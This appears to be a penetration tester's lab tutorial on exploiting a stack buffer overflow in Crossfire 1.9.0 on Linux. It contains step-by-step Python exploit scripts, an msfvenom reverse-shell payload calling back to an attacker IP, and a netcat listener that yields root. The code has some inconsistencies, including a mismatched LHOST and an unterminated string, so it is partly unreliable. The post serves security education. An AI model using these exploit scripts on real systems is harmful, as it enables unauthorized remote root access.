<!doctype html>
<html lang="en-us">
  <head>
    <title>Notes - Linux Buffer Overflows // FMisi&#39;s security.log</title>
    <link rel="shortcut icon" href="../favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.105.0">
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="FMisi" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="../../stiluslapom.css" />

    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Notes - Linux Buffer Overflows"/>
<meta name="twitter:description" content=""/>
    <meta property="og:title" content="Notes - Linux Buffer Overflows" />
	<meta name="og:description" content=""/>
<meta property="og:type" content="article" />
<meta property="og:url" content="https://fmisi.github.io/notes/4-maintain-access/index.html" /><meta property="article:section" content="notes" />
<meta property="article:published_time" content="2022-07-01T23:18:05+13:00" />
<meta property="article:modified_time" content="2022-07-01T23:18:05+13:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://fmisi.github.io/"><img class="app-header-avatar" src="../../avatar.jpg" alt="FMisi" /></a>
      <span class="app-header-title">FMisi</span>
      <nav class="app-header-menu">
        <a class="app-header-menu-item" href="../../index.html">/root</a>
           - 
        
        <a class="app-header-menu-item" href="../../htb/index.html">/htb</a>
           - 
    
        <a class="app-header-menu-item" href="../../case-studies/index.html">/case-studies</a>
           - 
        
        <a class="app-header-menu-item" href="../../notes/index.html">/notes</a>
           - 
    
        <a class="app-header-menu-item" href="../../contact/index.html">/contact</a>
           - 
    
        <a class="app-header-menu-item" href="../../support/index.html">/support</a>      
      </nav>
      <p>FMisi is a penetration tester.</p></br>
      <a style="font-size: smaller;" href="../../../privacy/index.html">Privacy Policy</a></br>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <script data-name="BMC-Widget" data-cfasync="false" src="https://cdnjs.buymeacoffee.com/1.0.0/widget.prod.min.js" data-id="fmisi" data-description="Support me on Buy me a coffee!" data-message="" data-color="#40DCA5" data-position="Right" data-x_margin="18" data-y_margin="18"></script>
      <h1 class ="post-title">Notes - Linux Buffer Overflows</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Mar 27, 2023
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          20 min read
        </div>
      </div>
    </header>
    <div class="post-content"></br>
	A buffer overflow is a type of software vulnerability that occurs when a program attempts to write more data to a buffer, which is a temporary storage area in a computer's memory, than it can actually hold.</br>This can cause the extra data to overflow into adjacent memory locations, potentially overwriting important data and causing the program to crash or behave in unexpected ways.</br></br>In some cases, this can even allow an attacker to execute malicious code or take control of the affected system.

</br>Buffer overflows can occur in a variety of programs, including web applications, operating systems, and network services.</br>They are often caused by programming errors such as using unsafe functions, not validating input properly, or not checking the size of input data before writing it to a buffer.

</br></br>To prevent buffer overflows, developers can use safe programming practices such as bounds checking, input validation, and secure coding practices like using memory-safe languages.</br>Additionally, system administrators can use intrusion detection systems and firewalls to detect and block malicious traffic that attempts to exploit buffer overflow vulnerabilities.</br>
<h3>Anatomy of the Memory</h3>
A typical computer's processor with Intel x86 architecture has a memory anatomy which looks like the following.</br>
The kernel section is located at the top of the memory.</br>
The stack section - which is the most interesting for buffer overflows - is located under the kernel section.</br>
The heap section is located under the stack section.</br>
The data section is located undert the heap section.</br>
Finally, the text section is located under the data section.</br>
The stack section and the heap section are large compared to the other sections.</br>
The heap section - if it is not the same size as the stack section - is the largest.
<h3>Anatomy of the Stack</h3>
A typical computer's processor with Intel x86 architecture has a stack anatomy which looks like the following.</br>
The ESP (Extended Stack Pointer) register is located at the top of the stack.</br>
Under ESP is the Buffer Space where we can store our input.</br>
Finally there is the EBP (Extended Base Pointer) register which is at the bottom of the stack, under the EBP register.</br>
Reaching the end of the stack there is the EIP (Extendid Instruction Pointer) register.</br>
Controlling the EIP register by being able the write to it can lead to buffer overflow vulnerability if the place for the shellcode is/can be large enough.</br>
<h3>Steps of Buffer Overflow</h3>
1. Spiking
<pre>Searching for a vulnerable part</br>of the program</pre>
2. Fuzzing
<pre>We send a bunch of characters for</br>the program and see</br>if we can crash it</pre>
3. Finding the Offset
<pre>If we can crash it, we search for</br>at what point we can crash it</br>(this point is called the offset)</pre>
4. Overwriting EIP
<pre>We utilize the Offset</br>to overwrite the EIP</pre>
5. Finding Bad Characters</br>
6. Finding the Right Module</br>
7. Generating Shellcode</br>
8. Root!</br>
<h3>1. Spiking</h3>
In this entry, the environment where we test looks like the following.</br>
We have an attacker machine running Kali Linux (the tools to be utilized are found on Parrot OS too) and a machine running the most recent version of Debian Linux with 64 bit architecture.</br>
The Kali Linux has an IP address of 10.11.0.6 and the Debian machine has an IP address of 10.11.0.128, both machines are on the 10.11.0.0/24 subnet, and can communicate with each other.</br>
For the purpose of this entry, the Debian machine runs Crossfire, a linux based role playing game.</br>
Specifically, Crossfire 1.9.0 is vulnerable to a network based buffer overflow when passing a string of more than 4000 bytes to the setup sound command.</br>
The Debian machine also has edb downloaded.</br>
Unfortunately, antivirus solutions do not pick up crossfire at the time of this writing.</br>
Let's assume that antivirus solutions are turned off on the Debian machine.</br>
The Crossfire application has been compiled without any memory protection mechanism.</br>
First things first, we start the Crossfire application with administrative privileges.</br>
We do the same with edb.</br>
In edb, we click File --> Attach and search for the vulnserver process.</br>
We click on the vulnserver process and click on the Attach button.</br>
If something has been attached to edb, it gets paused.</br>
The run it, we do not need to search for the Run button.</br>
It could be more convenient to press F9 and it will resume the application from the Paused state.</br></br>
The Crossfire application listens on port 13327 by default.</br></br>
We skip the spiking step because we already know that the Crossfire application's vulnerable input field is the field after the setup sound command.
<h3>2. Fuzzing</h3>
We can crash the application and we know what input field we can utilize to achive the crash of the application.</br>
Let's determine the place in memory where the crash happens.</br>
We can do it easily with a script.</br>
We can copy and modify a script from the public exploit instead of writing the exploit from scratch.</br>
Let's make and execute the script now!</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 1.py</span>
</code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import socket</br></br>host = "10.11.0.128"</br></br>buffer = "A" * 100</br></br>crash = "\x41" * 4379</br></br>buffer = "\x11(setup sound " + crash + "\x90\x00#"</br></br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>print("[*]Sending evil buffer...")</br></br>s.connect((host, 13327))</br>print(s.recv(1024))</br></br>s.send(buffer)</br>s.close()</br></br>print("[*]Payload Sent !")</br></span>
</code></div>
Let's execute the script.
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 1.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./1.py</span></code></div>
It looks like the fuzzing crashed.
Let's find the offset now!
<h3>3. Finding the Offset</h3>
ceil(4000) = ? = 5000, but the public exploit utilizes the 4379 multiplier with a bunch of A characters, so we can work with that.
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4379</br>Aa0[...]</br>*copy*</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import socket</br></br>host = "10.11.0.128"</br></br>pattern = "Aa0[...]"</br></br>buffer = "\x11(setup sound " + pattern + "\x90\x00#"</br></br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>print("[*]Sending evil buffer...")</br></br>s.connect((host, 13327))</br>print(s.recv(1024))</br></br>s.send(buffer)</br>s.close()</br></br>print("[*]Payload Sent !")</br></span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
After executing this script, we can see in edb that the EIP register's value changed to 46367046.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 4379 -q 46367046</br>[*] Exact match at offset 4368</span></code></div>
Solution for step number three: the offset is at the 4368th byte.
<h3>4. Overwriting the EIP</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import socket</br></br>host = "10.11.0.128"</br></br>crash = "\x41" * 4368 + "B" * 4 + "C" * 7</br></br>buffer = "\x11(setup sound " + crash + "\x90\x00#"</br></br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>print("[*]Sending evil buffer...")</br></br>s.connect((host, 13327))</br>print(s.recv(1024))</br></br>s.send(buffer)</br>s.close()</br></br>print("[*]Payload Sent !")</br></span></code></div>
We don't need to issue the chmod command if we just modify a script that is already executable but I will issue the chmod command anyway.
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
In edb, we can see that - for example - the EBP register's value changed to 41414141 but the EIP register's value is not 41414141 now but 42424242.</br>
42 is hex code for B.</br>
We can also see that there is space for the C characters too.</br>
We have just successfully overwritten the EIP register!
<h3>5. Finding Bad Characters</h3>
When we generate/write shellcode, we must know what characters are good for the shellcode and what characters are not good for the shellcode.</br>
To find bad characters, we can run all the hex characters through the application and see if any of then act up.</br>
By default, the null byte (/x00) character acts up, so we don't worry about it and remember that the /x00 is a bad character.</br>
Before we can find more bad characters, it is advisable to find space for our shellcode.</br>
<h3>5.1. Locating Space For Our Shellcode</h3>
The EAX register seems to point to the beginning of our buffer, including the "setup sound" string.</br>
The fact that EAX points directly to the beginning of the command string may impact our ability to simply jump to the buffer pointed at by EAX as we would be executing the hex opcode's equivalent of the ASCII string "setup sound" before our shellcode.</br>This would most likely mangle the execution path and cause our exploit to fail...</br></br>...or, would it?</br></br>
Further examination of the actual opcode (copy the EAX register's value, press Ctrl+G and paste the value in 0x01234567 format) generated by the setup sound string reveals some interesting instructions.</br></br>
<img src="yesice.png" alt="The opcode instructions translate to conditional jumps"></br></br>
The opcode instructions translate to conditional jumps.</br>
All this jumps seem to be leading into our controlled buffer, so a jump to EAX may actually work for us in this case...</br>
...however, this is NOT an elegant solution, so let's try harder!</br>
Continuing our analysis, it looks like the ESP register points towards the end of our unique buffer at the time of the crash but it only gives a few bytes of shellcode to work with.</br>
Right click on the ESP register's value and click "Follow in Dump".</br></br>
<img src="yesice2.png" alt="The opcode instructions translate to conditional jumps"></br></br>
We can try to insert a first stage shellcode into that limited space.</br>
Rather than an actual payload such as a reverse shell, this first stage payload will be used to align the EAX register in order to make it point to our buffer right after the setup sound string and then jump to that location, allowing us to skip the conditional jumps.</br>
In order to achieve this, our first stage shellcode would need to increase the value of EAX by twelve bytes as there are twelve characters in the string "setup sound".</br>
We can accomplish this with an ADD assembly instruction and then using a JMP assembly instruction to jump to the memory pointed by EAX.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># locate nasm_shell</br>[...]</br>/usr/[...]/nasm_shell.rb</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># /usr/[...]/nasm_shell.rb</span>
<span><span>nasm> ADD EAX,12</br>00000000    83C00C    add eax,byte +0xc</br>nasm> JMP EAX</br>00000000    FFE0      jmp eax</span></code></div>
The ADD EAX,12 assembly instruction's opcode equivalent is 83C00C.</br>
The JMP EAX assembly instruction's opcode equivalent is FFE0.</br>
Fortunately for us, this two sets of instructions take up only five bytes of memory.</br>
We can update our script to include this first stage payload and two "\x90" knobs in order to maintain the correct length.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-nasm" data-lang="nasm"><span style="display:flex;">
<span><span>nasm> exit</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import socket</br></br>host = "10.11.0.128"</br></br>first_stage = "\x83\xc0\x0c\xff\xe0\x90\x90"</br></br>crash = "\x41" * 4368 + "\x42" * 4 + first_stage</br></br>buffer = "\x11(setup sound " + crash + "\x90\x00#"</br></br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>print("[*]Sending evil buffer...")</br></br>s.connect((host, 13327))</br>print(s.recv(1024))</br></br>s.send(buffer)</br>s.close()</br></br>print("[*]Payload Sent !")</br></span></code></div>
<h3>5.2. Actually Finding Bad Characters</h3>
Let's go to <a href="https://github.com/cytopia/badchars">https://github.com/cytopia/badchars</a> page and copy the badchars = ( "\x01\[...]") stuff under Python.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import socket</br></br>badchars = ("\x01\[...]"</br>)</br></br>host = "10.11.0.128"</br></br>crash = "\x41" * 4368 + "B" * 4 + badchars</br></br>buffer = "\x11(setup sound " + crash + "\x90\x00#"</br></br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>print("[*]Sending evil buffer...")</br></br>s.connect((host, 13327))</br>print(s.recv(1024))</br></br>s.send(buffer)</br>s.close()</br></br>print("[*]Payload Sent !")</br></span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
It is the ESP register's value that we have to follow in dump to find bad characters.</br>
In edb, right click on the ESP register's value and select "Follow in Dump".</br>
In case we can only examine the shellcode's space, after executing (and modifing appropriately) the script multiple times can we see an anomaly in the Hex dump view, which means the \x00 character is not the only one bad character.</br>
We can see that the \x20 is a bad character too.</br>
We do not see any anomaly after that.</br>
We have successfully found all bad characters.</br>
Let's see an example of another application's hex dump.</br></br>
<img src="image.png" height="65%" width="65%" alt="hex dump of another app"></br></br>
If we see this, the B0 character itself is <b>not</b> a bad character.</br>
Furthermore, if we see B0 characters next to each other, only the first one from the left marks the place of a bad character.</br>
On the picture, the places where the bad characters can be found are marked with a red quadrilateral.
<h3>6. Finding the Right Module</h3>
A right module is a DLL or something similar that does not have memory protection (such as DEP, ASLR, SSDH, etc.).</br>
Do you remember that the application was compiled without memory protections?</br>
The right module in this case will be the application itself as it was compiled without any memory protections.</br>
Before generating the shellcode, it is advisable to achieve an overflow, where the program "fills up", waiting for further instructions.</br>
Let's do try to achieve this now!</br>
We can do this by finding a return address by finding a valid assembly intruction to redirect code execution to the memory location pointed to by the ESP register.</br>
In edb, click Plugins --> OpcodeSearcher --> Opcode Search.</br>
Using this plugin, we can easily search for a JMP ESP assembly instruction or equivalent in the memory region where the code section of the Crossfire application is mapped.</br></br>
<img src="yesice3.png" height="65%" width="65%" alt="search for a JMP ESP assembly instruction or equivalent in the memory region"></br></br>
We choose to proceed with the first JMP ESP assembly instruction found by the debugger.</br>
We copy this instruction's address value, but we only need it's 0x12345678 format.</br>
We are getting closer so let's restart everything before we continue.</br>
Before we modify our script, let's set a breakpoint on the JMP ESP return address.</br>
We can do this with the edb BreakpointManager plugin.</br>
In edb, click Plugins --> BreakpointManager --> Breakpoints.</br>
We click on the Add Breakpoint button and paste the address value on the popup window's input field.</br>
This address will be 0x08134596.</br>
We click on the OK button, then on the Close button.</br>
Then we let the application run and return to Kali.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import socket</br></br>host = "10.11.0.128"</br></br>padding = "\x41" * 4368</br></br>eip = "\x96\x45\x13\x08" # because of little endianness, we write this value in reverse order</br></br>first_stage = "\x83\xc0\x0c\xff\xe0\x90"</br></br>buffer = "\x11(setup sound " + padding + eip + first_stage + "\x90\x00#"</br></br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>print("[*]Sending evil buffer...")</br></br>s.connect((host, 13327))</br>print(s.recv(1024))</br></br>s.send(buffer)</br>s.close()</br></br>print("[*]Payload Sent !")</br></span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># ./2.py</span></code></div>
If we done everything right, the debugger stopped at the JMP ESP instruction, and the appliation wait's for further commands.</br>
Restart and re-attach.</br>
<h3>7. Generating Shellcode</h3>
The shellcode must contain a non-staged payload as we are goind to utilize it while listening with netcat.</br>
The netcat tool can only listen to non-staged payloads, it is essentially deef when it comes to staged payloads as it can only hear the stages separate to each other.</br>
Let's generate a non-staged payload with msfvenom.</br>
Note that we do not need to set the EXITFUNC to thread in this case, but it doesn't hurt to try.</br>
The -f is the file type switch, the -a is the architecture switch, the -b is the bad characters switch.</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.4 LPORT=443 -b "\x00\x20" -f py -v shellcode</br>[...]</br>Payload size: 95 bytes</br>[...]</br>"shellcode = ""[...]</br>\x36"  *copy*</br></span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># gedit 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;">
<span><span>#!/usr/bin/python</br>import socket</br></br>host = "10.11.0.128"</br></br>nop_sled = "\x90" * 8 # NOP sled knobs</br></br>shellcode = ""</br></br>shellcode += "\xbe\x35\x9e\xa3\x7d\xd9\xe8\xd9\x74\x24\xf4\x5a\x29"</br></br>[...]</br></br>shellcode += "\x7f\x6d\x02\x36"</br></br>padding = "\x41" * (4368 - len(nop_sled) - len(shellcode))</br></br>eip = "\x96\x45\x13\x08" # 0x08134596</br></br>first_stage = "\x83\xc0\x0c\xff\xe0\x90\x90"</br></br>buffer = "\x11(setup sound " + nop_sled + shellcode + padding + eip + first_stage +"\x90\x00#</br></br>s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</br>print("[*]Sending evil buffer...")</br></br>s.connect((host, 13327))</br>print(s.recv(1024))</br></br>s.send(buffer)</br>s.close()</br></br>print("[*]Payload Sent !")</br></span></code></div>
Done. Let's try getting a shell.
<h3>8. Root!</h3>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># nc -lvnp 443</span></code></div>
edb is not necessary, but Crossfire must be running.</br>
If we would re-attach the Crossfire application to edb, the debugger would catch SIGCHLD events, causing the application to pause whenever a command has been executed through our reverse shell.</br>
On another tab on the Kali machine:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># chmod +x 2.py</span></code></div>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># .2.py</span></code></div>
Looking back to the tab with netcat running, we see that we got a shell!</br>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;">
<span><span># nc -lvnp 443</br>whoami</br>root</br></span></code></div>
</div>
</br></br>
~Thank you for reading~
<h3 id="useful-references">Useful references</h3>
<ul>
<li><a href="https://github.com/cytopia/badchars">https://github.com/cytopia/badchars</a></li>
<li><a href="https://github.com/corelan/mona">https://github.com/corelan/mona</a></li>
</ul>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
